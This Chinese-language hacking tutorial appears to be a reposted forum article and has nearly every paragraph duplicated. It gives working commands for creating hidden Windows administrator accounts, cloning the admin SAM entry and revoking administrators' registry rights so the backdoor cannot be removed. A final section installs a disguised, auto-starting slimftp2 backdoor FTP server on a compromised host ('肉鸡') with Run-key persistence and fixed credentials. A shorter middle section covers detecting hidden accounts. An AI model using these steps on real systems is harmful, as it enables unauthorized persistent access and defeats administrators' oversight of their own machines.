显示用户列表的地方有
1.控制面板-用户管理
2.计算机管理-本地用户和组
3.在命令行中使用NET USER
4.XP开机时如果不是用传统界面,系统会把当前系统所有非默认用户列出来
5.我的电脑
这已经涉及到黑客的问题了。我在这里只介绍怎么隐藏账户,至于文件夹,你简单的设置为隐藏属性就可以了。
一、“命令提示符”中的阴谋
点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net user piao$ 123456 /add”,回车,成功后会显示“命令成功完成”。接着输入“net localgroup administrators piao$ /add”回车,这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。
这种方法只能将账户在“命令提示符”中进行隐藏,而对于“计算机管理”则无能为力。因此这种隐藏账户的方法并不是很实用,只对那些粗心的管理员有效,是一种入门级的系统账户隐藏技术。
点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net user piao$ 123456 /add”,回车,成功后会显示“命令成功完成”。接着输入“net localgroup administrators piao$ /add”回车,这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。
这种方法只能将账户在“命令提示符”中进行隐藏,而对于“计算机管理”则无能为力。因此这种隐藏账户的方法并不是很实用,只对那些粗心的管理员有效,是一种入门级的系统账户隐藏技术。
二、在“注册表”中玩转账户隐藏
那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢?答案是肯定的,而这一切只需要我们在“注册表”中进行一番小小的设置,就可以让系统账户在两者中完全蒸发。
那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢?答案是肯定的,而这一切只需要我们在“注册表”中进行一番小小的设置,就可以让系统账户在两者中完全蒸发。
1、峰回路转,给管理员注册表操作权限
在注册表中对系统账户的键值进行操作,需要到“HKEY_LOCAL_MACHINESAMSAM”处进行修改,但是当我们来到该处时,会发现无法展开该处所在的键值。这是因为系统默认对系统管理员给予“写入DAC”和“读取控制”权限,没有给予修改权限,因此我们没有办法对“SAM”项下的键值进行查看和修改。不过我们可以借助系统中另一个“注册表编辑器”给管理员赋予修改权限。
点击“开始”→“运行”,输入“regedt32.exe”后回车,随后会弹出另一个“注册表编辑器”,和我们平时使用的“注册表编辑器”不同的是它可以修改系统账户操作注册表时的权限(为便于理解,以下简称regedt32.exe)。在regedt32.exe中来到“HKEY_LOCAL_MACHINE\SAM\SAM”处,点击“安全”菜单→“权限”,在弹出的“SAM的权限”编辑窗口中选中“administrators”账户,在下方的权限设置处勾选“完全控制”,完成后点击“确定”即可。然后我们切换回“注册表编辑器”,可以发现“HKEY_LOCAL_MACHINE\SAM\SAM”下面的键值都可以展开了。
提示:上文中提到的方法只适用于Windows NT/2000系统。在Windows XP系统中,对于权限的操作可以直接在注册表中进行,方法为选中需要设置权限的项,点击右键,选择“权限”即可。
点击“开始”→“运行”,输入“regedt32.exe”后回车,随后会弹出另一个“注册表编辑器”,和我们平时使用的“注册表编辑器”不同的是它可以修改系统账户操作注册表时的权限(为便于理解,以下简称regedt32.exe)。在regedt32.exe中来到“HKEY_LOCAL_MACHINE\SAM\SAM”处,点击“安全”菜单→“权限”,在弹出的“SAM的权限”编辑窗口中选中“administrators”账户,在下方的权限设置处勾选“完全控制”,完成后点击“确定”即可。然后我们切换回“注册表编辑器”,可以发现“HKEY_LOCAL_MACHINE\SAM\SAM”下面的键值都可以展开了。
提示:上文中提到的方法只适用于Windows NT/2000系统。在Windows XP系统中,对于权限的操作可以直接在注册表中进行,方法为选中需要设置权限的项,点击右键,选择“权限”即可。
2、偷梁换柱,将隐藏账户替换为管理员
成功得到注册表操作权限后,就可以正式开始隐藏账户的制作了。来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户。点击我们的隐藏账户“piao$”,在右边显示的键值中的“类型”一项显示为0x3e9,向上来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\”处,可以找到“000003E9”这一项,这两者是相互对应的,隐藏账户“piao$”的所有信息都在“000003E9”这一项中。同样的,我们可以找到“administrator”账户所对应的项为“000001F4”。将“piao$”的键值导出为“piao$.reg”,同时将“000003E9”和“000001F4”项的F键值分别导出为user.reg,admin.reg。用“记事本”打开admin.reg,将其中“F”值后面的内容复制下来,替换user.reg中的“F”值内容,完成后保存。接下来进入“命令提示符”,输入“net user piao$ /del”将我们建立的隐藏账户删除。最后,将piao$.reg和user.reg导入注册表,至此,隐藏账户制作完成。
成功得到注册表操作权限后,就可以正式开始隐藏账户的制作了。来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户。点击我们的隐藏账户“piao$”,在右边显示的键值中的“类型”一项显示为0x3e9,向上来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\”处,可以找到“000003E9”这一项,这两者是相互对应的,隐藏账户“piao$”的所有信息都在“000003E9”这一项中。同样的,我们可以找到“administrator”账户所对应的项为“000001F4”。将“piao$”的键值导出为“piao$.reg”,同时将“000003E9”和“000001F4”项的F键值分别导出为user.reg,admin.reg。用“记事本”打开admin.reg,将其中“F”值后面的内容复制下来,替换user.reg中的“F”值内容,完成后保存。接下来进入“命令提示符”,输入“net user piao$ /del”将我们建立的隐藏账户删除。最后,将piao$.reg和user.reg导入注册表,至此,隐藏账户制作完成。
3、过河拆桥,切断删除隐藏账户的途径
虽然我们的隐藏账户已经在“命令提示符”和“计算机管理”中隐藏了,但是有经验的系统管理员仍可能通过注册表编辑器删除我们的隐藏账户,那么如何才能让我们的隐藏账户坚如磐石呢?
打开“regedt32.exe”,来到“HKEY_LOCAL_MACHINESAMSAM”处,设置“SAM”项的权限,将“administrators”所拥有的权限全部取消即可。当真正的管理员想对“HKEY_LOCAL_MACHINESAMSAM”下面的项进行操作的时候将会发生错误,而且无法通过“regedt32.exe”再次赋予权限。这样没有经验的管理员即使发现了系统中的隐藏账户,也是无可奈何的。
虽然我们的隐藏账户已经在“命令提示符”和“计算机管理”中隐藏了,但是有经验的系统管理员仍可能通过注册表编辑器删除我们的隐藏账户,那么如何才能让我们的隐藏账户坚如磐石呢?
打开“regedt32.exe”,来到“HKEY_LOCAL_MACHINESAMSAM”处,设置“SAM”项的权限,将“administrators”所拥有的权限全部取消即可。当真正的管理员想对“HKEY_LOCAL_MACHINESAMSAM”下面的项进行操作的时候将会发生错误,而且无法通过“regedt32.exe”再次赋予权限。这样没有经验的管理员即使发现了系统中的隐藏账户,也是无可奈何的。
三.专用工具,使账户隐藏一步到位
改动注册表,对新手而言是有一定风险的,而且也很繁琐,这时候可以用名叫“HideAdmin”的工具,下载下来后解压到c盘。然后运行“命令提示符”,输入“HideAdmin piao$ 123456”即可,如果显示“Create a hiden Administrator piao$ Successed!”,则表示已经成功建立一个账户名为piao$,密码为123456的隐藏账户。利用这款工具建立的账户隐藏效果和上文中修改注册表的效果是一样的。
改动注册表,对新手而言是有一定风险的,而且也很繁琐,这时候可以用名叫“HideAdmin”的工具,下载下来后解压到c盘。然后运行“命令提示符”,输入“HideAdmin piao$ 123456”即可,如果显示“Create a hiden Administrator piao$ Successed!”,则表示已经成功建立一个账户名为piao$,密码为123456的隐藏账户。利用这款工具建立的账户隐藏效果和上文中修改注册表的效果是一样的。
四、把“隐藏账户”请出系统
隐藏账户的危害可谓十分巨大。因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统
1、添加“$”符号型隐藏账户
对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限。那么我们只需要在“命令提示符”中输入“net localgroup administrators”就可以让所有的隐藏账户现形。如果嫌麻烦,可以直接打开“计算机管理”进行查看,添加“$”符号的账户是无法在这里隐藏的。
2、修改注册表型隐藏账户
由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到注册表中删除隐藏账户。来到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”,把这里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可。
3、无法看到名称的隐藏账户
如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建立的隐藏账户名称。不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。点击“开始”→“运行”,输入“gpedit.msc”运行“组策略”,依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后“确定”。对“审核登陆事件”和“审核过程追踪”进行相同的设置。
开启登陆事件审核功能进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账户就暴露无疑了。
通过事件查看器找到隐藏帐户得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限。但是我们可以在“命令提示符”中输入“net user 隐藏账户名称 654321”更改这个隐藏账户的密码。这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆。
隐藏账户的危害可谓十分巨大。因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统
1、添加“$”符号型隐藏账户
对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限。那么我们只需要在“命令提示符”中输入“net localgroup administrators”就可以让所有的隐藏账户现形。如果嫌麻烦,可以直接打开“计算机管理”进行查看,添加“$”符号的账户是无法在这里隐藏的。
2、修改注册表型隐藏账户
由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到注册表中删除隐藏账户。来到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”,把这里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可。
3、无法看到名称的隐藏账户
如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建立的隐藏账户名称。不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。点击“开始”→“运行”,输入“gpedit.msc”运行“组策略”,依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后“确定”。对“审核登陆事件”和“审核过程追踪”进行相同的设置。
开启登陆事件审核功能进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账户就暴露无疑了。
通过事件查看器找到隐藏帐户得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限。但是我们可以在“命令提示符”中输入“net user 隐藏账户名称 654321”更改这个隐藏账户的密码。这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆。
slimftp2的使用!!!
在这里,我假定大家已经获得了一个管理员或者系统权限的shell,这是安装它必需的权限。
安装步骤:安装步骤分为本地设置和服务器设置。
本地设置:将本文附带的文件全部放在一个文件夹里面,这里是d:\ftp,然后运行adminftp.exe。运行窗口分成三部分,最上面是服务器的参数的设置,左下方是用户帐号的设置,右下方是访问目录的设置。
对于服务器参数的设置,只需要对server port(服务器端口)进行一下设置就可以了,因为服务器上通常还运行有ftp服务器,所以,我们改一个不一样的端口,这里我是设置了3323,另外两个参数就不用管了。然后,我们再添加一个用户,点一下new,输入一个用户名root,再选中这个用户,输入一个密码nopass 。最后,在localroot上输入一个路径c:\,这是作为root用户的根目录的,点一下new,在弹出的窗口上输入 / 就可以了,再将下面的四个权限全部钩上吧。read权限允许用户下载文件,write权限允许用户上传文件,list权限允许用户看目录列表,admin权限允许用户重命令和删除ftp服务器上的文件。如果需要,还可以创建多个用户,这就要看你了。
进入命令行,切换目录到d:\ftp,输入reg export "HKLM\SOFTWARE\WhitSoft Development" ftp.reg
在这里,我假定大家已经获得了一个管理员或者系统权限的shell,这是安装它必需的权限。
安装步骤:安装步骤分为本地设置和服务器设置。
本地设置:将本文附带的文件全部放在一个文件夹里面,这里是d:\ftp,然后运行adminftp.exe。运行窗口分成三部分,最上面是服务器的参数的设置,左下方是用户帐号的设置,右下方是访问目录的设置。
对于服务器参数的设置,只需要对server port(服务器端口)进行一下设置就可以了,因为服务器上通常还运行有ftp服务器,所以,我们改一个不一样的端口,这里我是设置了3323,另外两个参数就不用管了。然后,我们再添加一个用户,点一下new,输入一个用户名root,再选中这个用户,输入一个密码nopass 。最后,在localroot上输入一个路径c:\,这是作为root用户的根目录的,点一下new,在弹出的窗口上输入 / 就可以了,再将下面的四个权限全部钩上吧。read权限允许用户下载文件,write权限允许用户上传文件,list权限允许用户看目录列表,admin权限允许用户重命令和删除ftp服务器上的文件。如果需要,还可以创建多个用户,这就要看你了。
进入命令行,切换目录到d:\ftp,输入reg export "HKLM\SOFTWARE\WhitSoft Development" ftp.reg
现在本地操作已经全部完成了。
远程操作:将f tp.reg、slimftp2.exe、reg.exe都上传到肉鸡上,然后将slimftp2.exe拷贝到肉鸡的系统目录(通常为
c:\winnt\****32,假如不存在)上。再运行
reg import f tp.reg
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe
copy slimftp2.exe %****root%\****32
slimftp2.exe
运行copy slimftp2.exe %****root%\****32这步的时候有时会提示出错,这是因为slimftp2.exe已经是在系统目录上了。最后,删除f tp.reg吧!
呵呵,一切都完成了,即使肉鸡重启我们的ftp服务器也会照样运行的。
不过,这个服务器的端口有点特别,我们怎么访问呢?
假如是用ie,这样输入就好了f tp://root:nopass@192.168.0.1:3323/ 将192.168.0.1替换成你服务器的ip就可以了。dos下的
ftp呢?这样!
ftp
open 192.168.0.1 3323
root
nopass
注意事项:你可以将slimftp2.exe的文件名、服务端口更改,但是,相应的步骤输入也应该更改。
比如,我将slimftp2.exe改名叫wsockup.exe,那么,
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe
就应该变为
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d wsockup.exe
远程操作:将f tp.reg、slimftp2.exe、reg.exe都上传到肉鸡上,然后将slimftp2.exe拷贝到肉鸡的系统目录(通常为
c:\winnt\****32,假如不存在)上。再运行
reg import f tp.reg
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe
copy slimftp2.exe %****root%\****32
slimftp2.exe
运行copy slimftp2.exe %****root%\****32这步的时候有时会提示出错,这是因为slimftp2.exe已经是在系统目录上了。最后,删除f tp.reg吧!
呵呵,一切都完成了,即使肉鸡重启我们的ftp服务器也会照样运行的。
不过,这个服务器的端口有点特别,我们怎么访问呢?
假如是用ie,这样输入就好了f tp://root:nopass@192.168.0.1:3323/ 将192.168.0.1替换成你服务器的ip就可以了。dos下的
ftp呢?这样!
ftp
open 192.168.0.1 3323
root
nopass
注意事项:你可以将slimftp2.exe的文件名、服务端口更改,但是,相应的步骤输入也应该更改。
比如,我将slimftp2.exe改名叫wsockup.exe,那么,
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe
就应该变为
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d wsockup.exe